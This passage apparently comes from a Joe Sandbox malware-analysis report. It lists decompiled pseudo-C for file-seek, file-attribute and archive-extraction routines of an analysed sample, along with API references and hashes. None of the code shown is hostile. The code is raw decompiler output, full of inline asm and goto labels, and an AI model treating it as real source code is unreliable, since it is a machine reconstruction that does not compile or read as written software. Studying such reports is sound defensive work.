                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prologfputs$fputc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 678540050-0
                                                                                                                    • Opcode ID: 18607300076e945ec9145c869bd86027ffadf1ff2f1011889f0123f2e6326d69
                                                                                                                    • Instruction ID: 6346743eb1a00a5a4593ed2ec109ab8888123b9bb1ddd6ff01abda32ec08cdfb
                                                                                                                    • Opcode Fuzzy Hash: 18607300076e945ec9145c869bd86027ffadf1ff2f1011889f0123f2e6326d69
                                                                                                                    • Instruction Fuzzy Hash: 5A11A336A081155BCF15B7A8D8179EE7BE5EF80710F5004A9F501622E1DF615982CBE4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B17450 Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 85%
                                                                                                                    			E00B17450(void** __ecx, intOrPtr __edx, long _a4, long _a8, signed int _a12, intOrPtr* _a16) {
				long _v8;
				long _t21;
				void* _t22;
				intOrPtr* _t24;
				void* _t25;
				long _t31;
				intOrPtr _t39;
				long _t41;
				void** _t44;

				_t39 = __edx;
				_push(__ecx);
				_t44 = __ecx;
				if( *((char*)(__ecx + 5)) != 0 &&  *((char*)(__ecx + 6)) != 0 && _a12 == 2) {
					_a4 = _a4 +  *((intOrPtr*)(__ecx + 8));
					asm("adc [ebp+0xc], ecx");
					_a12 = _a12 & 0x00000000;
				}
				_v8 = _a8;
				_t21 = SetFilePointer( *_t44, _a4,  &_v8, _a12); // executed
				_t41 = _t21;
				if(_t41 != 0xffffffff) {
					L7:
					_t22 = L00B7F440(_v8, 0, 0, 1);
					asm("adc edx, eax");
					_t24 = _a16;
					 *_t24 = _t22 + _t41;
					 *((intOrPtr*)(_t24 + 4)) = _t39;
					_t25 = 1;
				} else {
					_t31 = GetLastError();
					if(_t31 == 0) {
						goto L7;
					} else {
						L00B173F5(_t44, _t39, _a16);
						SetLastError(_t31);
						_t25 = 0;
					}
				}
				return _t25;
			}












                                                                                                                    0x00b17450
                                                                                                                    0x00b17453
                                                                                                                    0x00b17456
                                                                                                                    0x00b1745d
                                                                                                                    0x00b17471
                                                                                                                    0x00b17474
                                                                                                                    0x00b17477
                                                                                                                    0x00b17477
                                                                                                                    0x00b17483
                                                                                                                    0x00b17492
                                                                                                                    0x00b17498
                                                                                                                    0x00b1749d
                                                                                                                    0x00b174c0
                                                                                                                    0x00b174c9
                                                                                                                    0x00b174d4
                                                                                                                    0x00b174d6
                                                                                                                    0x00b174d9
                                                                                                                    0x00b174db
                                                                                                                    0x00b174de
                                                                                                                    0x00b1749f
                                                                                                                    0x00b174a5
                                                                                                                    0x00b174a9
                                                                                                                    0x00000000
                                                                                                                    0x00b174ab
                                                                                                                    0x00b174b0
                                                                                                                    0x00b174b6
                                                                                                                    0x00b174bc
                                                                                                                    0x00b174bc
                                                                                                                    0x00b174a9
                                                                                                                    0x00b174e4

                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(00000002,?,00000000,?,00000002,00000002,?,00000002,?,00B174FA,?,?,00000000,?,00B17551,?), ref: 00B17492
                                                                                                                    • GetLastError.KERNEL32(?,00B174FA,?,?,00000000,?,00B17551,?,?,?,?,00000000), ref: 00B1749F
                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00B174FA,?,?,00000000,?,00B17551,?,?,?,?,00000000), ref: 00B174B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1156039329-0
                                                                                                                    • Opcode ID: c70c40f4985875d9bd3b136c205bb25e7f49c0facd7d8703e1a595e177119b6a
                                                                                                                    • Instruction ID: 14da2aa53c9d9db5aadef46db5cee2507d9fad7755bcf7ee61b90c3f9c451ce8
                                                                                                                    • Opcode Fuzzy Hash: c70c40f4985875d9bd3b136c205bb25e7f49c0facd7d8703e1a595e177119b6a
                                                                                                                    • Instruction Fuzzy Hash: 2B11B830204205ABDF11DF68CC49BEA3BE5EF04324F048169F956973A0DBB0AD80DB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B157AB Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B157AB(WCHAR* __ecx, long __edx) {
				signed int _t19;
				signed int _t20;
				int _t24;
				int _t26;
				void* _t28;
				WCHAR* _t39;
				void* _t45;

				L00B7F140(E00B82D20, _t45);
				 *(_t45 - 0x10) = __edx;
				_t39 = __ecx;
				_t28 = E00B18760(__ecx);
				if(_t28 == 1) {
					L3:
					if(_t28 == 0) {
						L7:
						_t19 = 0;
					} else {
						_t20 = E00B12D90(_t45 - 0x1c);
						 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
						if(E00B18869(_t39, _t45 - 0x1c, _t45, _t20 & 0xffffff00 | _t28 != 0x00000001) == 0) {
							E00B11E89(_t22,  *(_t45 - 0x1c));
							goto L7;
						} else {
							_t24 = SetFileAttributesW( *(_t45 - 0x1c),  *(_t45 - 0x10));
							_t19 = E00B11E89(_t24,  *(_t45 - 0x1c)) & 0xffffff00 | _t24 != 0x00000000;
						}
					}
				} else {
					_t26 = SetFileAttributesW(__ecx,  *(_t45 - 0x10)); // executed
					if(_t26 == 0) {
						goto L3;
					} else {
						_t19 = 1;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t19;
			}










                                                                                                                    0x00b157b0
                                                                                                                    0x00b157bb
                                                                                                                    0x00b157be
                                                                                                                    0x00b157cb
                                                                                                                    0x00b157d0
                                                                                                                    0x00b157e0
                                                                                                                    0x00b157e2
                                                                                                                    0x00b15828
                                                                                                                    0x00b15828
                                                                                                                    0x00b157e4
                                                                                                                    0x00b157e7
                                                                                                                    0x00b157ec
                                                                                                                    0x00b15803
                                                                                                                    0x00b15822
                                                                                                                    0x00000000
                                                                                                                    0x00b15805
                                                                                                                    0x00b1580b
                                                                                                                    0x00b1581a
                                                                                                                    0x00b1581a
                                                                                                                    0x00b15803
                                                                                                                    0x00b157d2
                                                                                                                    0x00b157d6
                                                                                                                    0x00b157da
                                                                                                                    0x00000000
                                                                                                                    0x00b157dc
                                                                                                                    0x00b157dc
                                                                                                                    0x00b157dc
                                                                                                                    0x00b157da
                                                                                                                    0x00b15830
                                                                                                                    0x00b15838

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B157B0
                                                                                                                    • SetFileAttributesW.KERNELBASE(?,?,?,?,00000000), ref: 00B157D6
                                                                                                                    • SetFileAttributesW.KERNEL32(?,?,00000000,?,?,00000000), ref: 00B1580B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile$H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3790360811-0
                                                                                                                    • Opcode ID: 122a5ae5cde1ca30bbc81ff6af8f6367a59372c8db8dd3b93a3ae657eee607fd
                                                                                                                    • Instruction ID: c820dae9112bdb9c7f681891a63232d3c0b420bd2e533ae2d9c633efafdab9c0
                                                                                                                    • Opcode Fuzzy Hash: 122a5ae5cde1ca30bbc81ff6af8f6367a59372c8db8dd3b93a3ae657eee607fd
                                                                                                                    • Instruction Fuzzy Hash: 6B01F532D0021ADBCF11ABA4D8815FEBBF5EF80351FA444B5E811A3291CB754C82D690
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B1692E Relevance: 4.5, APIs: 3, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 77%
                                                                                                                    			E00B1692E(WCHAR* __ecx) {
				signed int _t12;
				long _t13;
				signed int _t14;
				void* _t16;
				long _t17;
				signed int _t20;
				WCHAR* _t30;
				void* _t36;

				L00B7F140(E00B82ED4, _t36);
				_t30 = __ecx;
				_t12 = E00B18760(__ecx);
				_t20 = _t12;
				if(_t20 == 1) {
					L2:
					if(_t20 == 0) {
						L6:
						_t13 = _t12 | 0xffffffff;
					} else {
						_t1 = _t36 - 0x18; // -24
						_t14 = E00B12D90(_t1);
						 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
						_t6 = _t36 - 0x18; // -24
						_t16 = E00B18869(_t30, _t6, _t36, _t14 & 0xffffff00 | _t20 != 0x00000001);
						_push( *((intOrPtr*)(_t36 - 0x18)));
						if(_t16 == 0) {
							_t12 = E00B11E89(_t16);
							goto L6;
						} else {
							_t17 = GetFileAttributesW(); // executed
							E00B11E89(_t17,  *((intOrPtr*)(_t36 - 0x18)));
							_t13 = _t17;
						}
					}
				} else {
					_t13 = GetFileAttributesW(__ecx); // executed
					if(_t13 == 0xffffffff) {
						goto L2;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t13;
			}











                                                                                                                    0x00b16933
                                                                                                                    0x00b1693e
                                                                                                                    0x00b16940
                                                                                                                    0x00b1694b
                                                                                                                    0x00b16950
                                                                                                                    0x00b1695a
                                                                                                                    0x00b1695c
                                                                                                                    0x00b16999
                                                                                                                    0x00b16999
                                                                                                                    0x00b1695e
                                                                                                                    0x00b1695e
                                                                                                                    0x00b16961
                                                                                                                    0x00b16966
                                                                                                                    0x00b16971
                                                                                                                    0x00b16976
                                                                                                                    0x00b1697d
                                                                                                                    0x00b16980
                                                                                                                    0x00b16993
                                                                                                                    0x00000000
                                                                                                                    0x00b16982
                                                                                                                    0x00b16982
                                                                                                                    0x00b16989
                                                                                                                    0x00b1698f
                                                                                                                    0x00b1698f
                                                                                                                    0x00b16980
                                                                                                                    0x00b16952
                                                                                                                    0x00b16953
                                                                                                                    0x00b16958
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b16958
                                                                                                                    0x00b169a2
                                                                                                                    0x00b169aa

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B16933
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000000,?), ref: 00B16953
                                                                                                                      • Part of subcall function 00B11E89: free.MSVCRT(?,00B36CD6,00000000,00000000,00000001,?,00B110EB), ref: 00B11E8D
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00000000,?,?,00000000,?), ref: 00B16982
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile$H_prologfree
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 86656847-0
                                                                                                                    • Opcode ID: 903fe53bfc1aec67a5afe3771422c3de948c51c00d547a6d1f83bedfe69b81d5
                                                                                                                    • Instruction ID: 396ee58e785af6f2aa463baa58e6ace39a9362f1c869d69d5f52172ed2ab63eb
                                                                                                                    • Opcode Fuzzy Hash: 903fe53bfc1aec67a5afe3771422c3de948c51c00d547a6d1f83bedfe69b81d5
                                                                                                                    • Instruction Fuzzy Hash: D401F4769002059BCF1177B8A8826FEB7E5EF88371FA402A6FD11A32D1CF315CC59690
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B248E3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 481COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 87%
                                                                                                                    			E00B248E3(void* __ecx) {
				void* __ebx;
				signed int _t186;
				void* _t194;
				void* _t195;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				signed int _t214;
				signed int _t217;
				char _t218;
				signed int _t220;
				signed int _t223;
				signed int _t227;
				signed int _t229;
				signed int _t239;
				signed int _t240;
				void* _t245;
				signed int _t250;
				intOrPtr _t257;
				void* _t271;
				void* _t273;
				signed int _t276;
				signed int _t279;
				intOrPtr* _t280;
				signed int _t282;
				signed int _t310;
				signed int _t316;
				signed int _t361;
				signed char* _t367;
				signed int _t368;
				signed int* _t370;
				intOrPtr* _t371;
				char* _t372;
				void* _t376;
				signed int _t378;
				void* _t379;

				L00B7F140(0xb83c5e, _t379);
				_t376 = __ecx;
				 *( *(_t379 + 0xc)) = 1;
				_t186 = E00B241B9(__ecx);
				_t276 = 0;
				if(_t186 != 0) {
					L95:
					 *[fs:0x0] =  *((intOrPtr*)(_t379 - 0xc));
					return _t186;
				}
				 *((intOrPtr*)(_t379 - 0x18)) =  *((intOrPtr*)(__ecx + 0x104));
				 *(_t379 - 0xd) =  *(_t379 - 0xd) & 0;
				 *(_t379 - 0x14) =  *( *(__ecx + 0x1c));
				_t186 = L00B378D7( *( *(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x104)), 0x15, _t379 - 0xd);
				_t385 = _t186;
				if(_t186 != 0) {
					goto L95;
				} else {
					E00B24329(0, _t376);
					_t354 = _t376 + 0x8c;
					E00B324E9(_t379 - 0x34, _t376 + 0x8c, _t385);
					_t386 =  *(_t379 - 0xd);
					 *((intOrPtr*)(_t379 - 4)) = 0;
					if( *(_t379 - 0xd) == 0) {
						E00B244BA(_t376, _t354);
					}
					E00B12EA8(_t379 - 0x28, _t386, _t379 - 0x34);
					 *((char*)(_t379 - 4)) = 1;
					if( *((intOrPtr*)(_t376 + 0x44)) != 3) {
						L6:
						_push(_t379 - 0x28);
						_t194 = L00B24F10(_t379 - 0x40, _t376 + 0x5c, _t388);
						 *((char*)(_t379 - 4)) = 2;
						_t195 = L00B12F78(_t379 - 0x28, _t194);
						 *((char*)(_t379 - 4)) = 1;
						E00B11E89(_t195,  *((intOrPtr*)(_t379 - 0x40)));
						L7:
						if( *((char*)(_t376 + 0xb0)) == 0) {
							L12:
							if( *((char*)(_t376 + 0xb2)) == 0) {
								__eflags =  *(_t376 + 0x30);
								if(__eflags != 0) {
									L23:
									_t367 =  *(_t379 + 0xc);
									L24:
									_t198 = L00B12F78(_t376 + 0xc0, _t379 - 0x28);
									__eflags =  *(_t379 - 0xd);
									if( *(_t379 - 0xd) == 0) {
										__eflags =  *((intOrPtr*)(_t376 + 0x1dc)) - _t276;
										if( *((intOrPtr*)(_t376 + 0x1dc)) == _t276) {
											__eflags =  *((intOrPtr*)(_t376 + 0x1c0)) - _t276;
											if( *((intOrPtr*)(_t376 + 0x1c0)) == _t276) {
												L40:
												_push(0x20);
												_t199 = E00B11E55();
												 *(_t379 - 0x14) = _t199;
												__eflags = _t199 - _t276;
												 *((char*)(_t379 - 4)) = 5;
												if(_t199 == _t276) {
													_t368 = 0;
													__eflags = 0;
												} else {
													_t368 = E00B1E7E7(_t199);
												}
												__eflags = _t368 - _t276;
												 *(_t379 - 0x14) = _t368;
												 *((char*)(_t379 - 4)) = 1;
												 *(_t376 + 0x118) = _t368;
												 *(_t379 - 0x1c) = _t368;
												if(_t368 != _t276) {
													 *((intOrPtr*)( *_t368 + 4))(_t368);
												}
												_t200 =  *(_t376 + 0x118);
												 *((char*)(_t379 - 4)) = 6;
												asm("sbb edx, edx");
												 *((intOrPtr*)(_t200 + 0x18)) = _t276;
												 *((intOrPtr*)(_t200 + 0x1c)) = _t276;
												_t201 = L00B1792C( *((intOrPtr*)(_t379 - 0x28)), ( ~( *(_t376 + 0x30)) & 0x00000002) + 2);
												__eflags = _t201;
												if(_t201 != 0) {
													_t361 =  *((intOrPtr*)(_t376 + 0x3b));
													 *((char*)(_t376 + 0x38)) = 1;
													__eflags = _t361;
													if(_t361 == 0) {
														L70:
														__eflags =  *((char*)(_t376 + 0x2d));
														if( *((char*)(_t376 + 0x2d)) == 0) {
															L79:
															__eflags =  *((char*)(_t376 + 0x1f0));
															if( *((char*)(_t376 + 0x1f0)) != 0) {
																__eflags =  *((char*)(_t376 + 0xb0));
																if(__eflags == 0) {
																	 *((intOrPtr*)(_t379 - 0x44)) =  *((intOrPtr*)(_t379 - 0x18));
																	E00B12EA8(_t379 - 0x40, __eflags, _t379 - 0x28);
																	 *((intOrPtr*)(_t379 - 0x18)) =  *((intOrPtr*)(_t376 + 0x1e8));
																	_t280 = _t376 + 0x1e4;
																	 *((char*)(_t379 - 4)) = 7;
																	_t214 = E00B2675D(_t379 - 0x44);
																	__eflags =  *((intOrPtr*)(_t379 - 0x18)) -  *((intOrPtr*)(_t376 + 0x1e8));
																	if( *((intOrPtr*)(_t379 - 0x18)) ==  *((intOrPtr*)(_t376 + 0x1e8))) {
																		_t165 =  *((intOrPtr*)( *_t280 + _t214 * 4)) + 4; // 0x4
																		_t214 = L00B12F78(_t165, _t379 - 0x28);
																	}
																	 *((char*)(_t379 - 4)) = 6;
																	E00B11E89(_t214,  *((intOrPtr*)(_t379 - 0x40)));
																	_t368 =  *(_t379 - 0x14);
																}
															}
															__eflags =  *(_t376 + 0x30);
															if( *(_t376 + 0x30) == 0) {
																L89:
																E00B1A98B( *((intOrPtr*)(_t379 + 8)), _t368);
																L90:
																E00B1A98B(_t376 + 0x11c, _t368);
																_t198 =  *(_t379 + 0xc);
																 *((char*)(_t379 - 4)) = 1;
																 *( *(_t379 + 0xc)) =  *( *(_t379 + 0xc)) & 0x00000000;
																__eflags = _t368;
																goto L91;
															} else {
																_t279 =  *((intOrPtr*)( *_t368 + 0x10))(_t368,  *((intOrPtr*)(_t376 + 0xd0)),  *((intOrPtr*)(_t376 + 0xd4)), 0, 0);
																__eflags = _t279;
																if(_t279 == 0) {
																	goto L89;
																}
																L86:
																__eflags = _t368;
																 *((char*)(_t379 - 4)) = 1;
																if(_t368 != 0) {
																	_t198 =  *((intOrPtr*)( *_t368 + 8))(_t368);
																}
																_t378 = _t279;
																goto L94;
															}
														}
														__eflags =  *(_t376 + 0x30);
														if( *(_t376 + 0x30) != 0) {
															goto L79;
														}
														__eflags = _t361;
														if(_t361 == 0) {
															goto L79;
														}
														_t310 =  *(_t376 + 0x10c);
														_t217 =  *(_t376 + 0x108);
														__eflags = _t310;
														if(_t310 > 0) {
															L75:
															 *(_t376 + 0x110) = _t217;
															 *(_t376 + 0x114) = _t310;
															_t218 = L00B17A6A( *(_t376 + 0x118) + 8, _t217, _t310); // executed
															__eflags = _t218;
															 *((char*)(_t376 + 0x3c)) = _t218;
															if(_t218 != 0) {
																L77:
																_t220 = L00B174FD( *(_t376 + 0x118) + 8); // executed
																__eflags = _t220;
																if(_t220 != 0) {
																	goto L79;
																}
																_push(_t379 - 0x28);
																_push("Cannot seek to begin of file");
																_t279 = L00B23AF8(_t376);
																__eflags = _t279;
																if(_t279 != 0) {
																	goto L86;
																}
																goto L79;
															}
															_push(_t379 - 0x28);
															_push( *0xb8a39c);
															_t279 = L00B23AF8(_t376);
															__eflags = _t279;
															if(_t279 != 0) {
																goto L86;
															}
															goto L77;
														}
														__eflags = _t217 - 0x1000;
														if(_t217 <= 0x1000) {
															goto L79;
														}
														goto L75;
													}
													_t223 =  *(_t376 + 0x10c);
													_t316 =  *(_t376 + 0x108);
													__eflags = _t223;
													if(_t223 > 0) {
														goto L70;
													}
													__eflags = _t316;
													if(_t316 <= 0) {
														goto L70;
													}
													__eflags = _t223;
													if(__eflags > 0) {
														goto L70;
													}
													if(__eflags < 0) {
														L60:
														__eflags =  *((char*)(_t376 + 0x100));
														if( *((char*)(_t376 + 0x100)) == 0) {
															goto L70;
														}
														__eflags = ( *(_t376 + 0xfc) & 0xf0000000) - 0xa0000000;
														if(( *(_t376 + 0xfc) & 0xf0000000) != 0xa0000000) {
															__eflags =  *((char*)(_t376 + 0x100));
															if( *((char*)(_t376 + 0x100)) == 0) {
																goto L70;
															}
															__eflags =  *(_t376 + 0xfd) & 0x00000004;
															if(( *(_t376 + 0xfd) & 0x00000004) == 0) {
																goto L70;
															}
															_t121 = _t376 + 0x37;
															 *_t121 =  *(_t376 + 0x37) & 0x00000000;
															__eflags =  *_t121;
															L66:
															E00B14268(_t376 + 0x120,  *(_t376 + 0x108));
															_push(0x14);
															_t227 = E00B11E55();
															__eflags = _t227;
															if(_t227 == 0) {
																_t227 = 0;
																__eflags = 0;
															} else {
																 *(_t227 + 4) =  *(_t227 + 4) & 0x00000000;
																 *_t227 = 0xb8a6bc;
															}
															_t370 = _t376 + 0x128;
															 *_t370 = _t227;
															E00B1A98B(_t376 + 0x12c, _t227);
															_t229 =  *_t370;
															 *(_t229 + 0x10) =  *(_t229 + 0x10) & 0x00000000;
															 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t376 + 0x120));
															 *((intOrPtr*)(_t229 + 0xc)) =  *((intOrPtr*)(_t376 + 0x124));
															E00B1A98B( *((intOrPtr*)(_t379 + 8)),  *((intOrPtr*)(_t376 + 0x12c)));
															_t368 =  *(_t379 - 0x14);
															goto L90;
														}
														 *(_t376 + 0x37) = 1;
														goto L66;
													}
													__eflags = _t316 - 0x1000;
													if(_t316 >= 0x1000) {
														goto L70;
													}
													goto L60;
												} else {
													_push(_t379 - 0x28);
													_push( *0xb8a394);
													_t378 = L00B23AF8(_t376);
													 *((char*)(_t379 - 4)) = 1;
													__eflags = _t378 - _t276;
													if(_t378 == _t276) {
														__eflags = _t368 - _t276;
														L91:
														if(__eflags != 0) {
															_t198 =  *((intOrPtr*)( *_t368 + 8))(_t368);
														}
														L93:
														_t378 = 0;
														L94:
														E00B11E89(E00B11E89(_t198,  *((intOrPtr*)(_t379 - 0x28))),  *((intOrPtr*)(_t379 - 0x34)));
														_t186 = _t378;
														goto L95;
													}
													__eflags = _t368 - _t276;
													if(_t368 != _t276) {
														_t198 =  *((intOrPtr*)( *_t368 + 8))(_t368);
													}
													goto L94;
												}
											}
											__eflags =  *((char*)(_t376 + 0xb0));
											if( *((char*)(_t376 + 0xb0)) != 0) {
												goto L40;
											}
											__eflags =  *((char*)(_t376 + 0xb2));
											if( *((char*)(_t376 + 0xb2)) != 0) {
												goto L40;
											}
											_push(_t379 - 0xe);
											_push(_t379 - 0x44);
											_t198 = L00B22E0E( *(_t379 - 0x14),  *((intOrPtr*)(_t379 - 0x18)));
											__eflags = _t198 - _t276;
											if(_t198 != _t276) {
												L20:
												_t378 = _t198;
												goto L94;
											}
											__eflags =  *((char*)(_t379 - 0xe));
											if( *((char*)(_t379 - 0xe)) == 0) {
												goto L40;
											}
											_t239 = E00B26886(_t376 + 0x1bc, _t379 - 0x44, _t276,  *((intOrPtr*)(_t376 + 0x1c0)));
											__eflags = _t239 - 0xffffffff;
											if(_t239 == 0xffffffff) {
												goto L40;
											}
											_t371 =  *((intOrPtr*)( *((intOrPtr*)(_t376 + 0x1c8)) + _t239 * 4));
											__eflags =  *((intOrPtr*)(_t371 + 4)) - _t276;
											if( *((intOrPtr*)(_t371 + 4)) != _t276) {
												_t240 = L00B1599D( *((intOrPtr*)(_t379 - 0x28)),  *_t371);
												__eflags = _t240;
												if(_t240 != 0) {
													E00B25E39(_t376);
													 *( *(_t379 + 0xc)) =  *( *(_t379 + 0xc)) & 0x00000000;
													E00B11E89(E00B11E89( *(_t379 + 0xc),  *((intOrPtr*)(_t379 - 0x28))),  *((intOrPtr*)(_t379 - 0x34)));
													_t186 = 0;
													goto L95;
												}
												_t245 = L00B1729C();
												_push(_t371);
												_push(_t379 - 0x28);
												_push( *0xb8a3a0);
												_push(_t245);
												_t198 = L00B23B8E(_t376, __eflags);
												__eflags = _t198 - _t276;
												if(_t198 == _t276) {
													goto L93;
												}
												goto L20;
											}
											L00B12F78(_t371, _t379 - 0x28);
											goto L40;
										}
										 *(_t379 + 0xb) =  *(_t379 + 0xb) & 0x00000000;
										_t372 = _t376 + 0x1d4;
										_push(_t379 + 0xb);
										_push(_t372);
										_push(_t379 - 0x28);
										_t250 = L00B25857(_t376);
										_t282 = _t250;
										__eflags = _t282;
										if(_t282 == 0) {
											__eflags =  *(_t379 + 0xb);
											if( *(_t379 + 0xb) != 0) {
												__eflags =  *_t372;
												_t69 =  *_t372 == 0;
												__eflags = _t69;
												 *((char*)(_t376 + 0x39)) = _t250 & 0xffffff00 | _t69;
												E00B25E39(_t376);
											}
											_t198 =  *(_t379 + 0xc);
											 *( *(_t379 + 0xc)) =  *( *(_t379 + 0xc)) & 0x00000000;
											goto L93;
										}
										E00B11E89(E00B11E89(_t250,  *((intOrPtr*)(_t379 - 0x28))),  *((intOrPtr*)(_t379 - 0x34)));
										_t186 = _t282;
										goto L95;
									}
									 *_t367 =  *_t367 & 0x00000000;
									goto L93;
								}
								_t367 =  *(_t379 + 0xc);
								_push(_t367);
								_push(_t379 - 0x28);
								_t198 = E00B245B7(_t376, __eflags); // executed
								__eflags = _t198 - _t276;
								if(_t198 == _t276) {
									__eflags =  *_t367;
									if( *_t367 != 0) {
										goto L93;
									}
									 *_t367 = 1;
									goto L24;
								}
								goto L20;
							}
							_t373 = _t376 + 0xc0;
							_t198 = L00B12F78(_t376 + 0xc0, _t379 - 0x28);
							if( *(_t379 - 0xd) != 0) {
								_t198 = L00B1584C( *_t373);
							}
							if( *((intOrPtr*)(_t376 + 0x1dc)) != _t276) {
								goto L23;
							} else {
								if( *(_t379 - 0xd) == 0) {
									_t198 = E00B25E39(_t376);
								}
								goto L93;
							}
						}
						_t257 =  *((intOrPtr*)(_t376 + 0xb4));
						if(_t257 == 0xffffffff) {
							goto L12;
						}
						 *((intOrPtr*)(_t379 - 0x44)) = _t257;
						E00B12D90(_t379 - 0x40);
						_t374 = _t376 + 0x1e4;
						 *((char*)(_t379 - 4)) = 3;
						_t283 = E00B26711(_t376 + 0x1e4, _t379 - 0x44);
						 *((char*)(_t379 - 4)) = 1;
						E00B11E89(_t260,  *((intOrPtr*)(_t379 - 0x40)));
						if(_t260 != 0xffffffff) {
							L00B12F78(_t379 - 0x28,  *((intOrPtr*)( *_t374 + _t283 * 4)) + 4);
							L00B11089(_t379 - 0x28, 0x3a);
							E00B12EA8(_t379 - 0x40,  *((intOrPtr*)( *_t374 + _t283 * 4)) + 4, _t376 + 0xa4);
							 *((char*)(_t379 - 4)) = 4;
							E00B32132(_t379 - 0x40);
							_t271 = L00B13171(_t379 - 0x28,  *((intOrPtr*)( *_t374 + _t283 * 4)) + 4, _t379 - 0x40);
							 *((char*)(_t379 - 4)) = 1;
							E00B11E89(_t271,  *((intOrPtr*)(_t379 - 0x40)));
						}
						_t276 = 0;
						goto L12;
					}
					_t273 = E00B185C6( *((intOrPtr*)(_t379 - 0x34)));
					_t388 = _t273;
					if(_t273 != 0) {
						goto L7;
					}
					goto L6;
				}
			}







































                                                                                                                    0x00b248e8
                                                                                                                    0x00b248f6
                                                                                                                    0x00b248f8
                                                                                                                    0x00b248fb
                                                                                                                    0x00b24900
                                                                                                                    0x00b24904
                                                                                                                    0x00b24eff
                                                                                                                    0x00b24f05
                                                                                                                    0x00b24f0d
                                                                                                                    0x00b24f0d
                                                                                                                    0x00b24913
                                                                                                                    0x00b24918
                                                                                                                    0x00b2491d
                                                                                                                    0x00b24928
                                                                                                                    0x00b2492d
                                                                                                                    0x00b2492f
                                                                                                                    0x00000000
                                                                                                                    0x00b24935
                                                                                                                    0x00b24937
                                                                                                                    0x00b2493c
                                                                                                                    0x00b24945
                                                                                                                    0x00b2494a
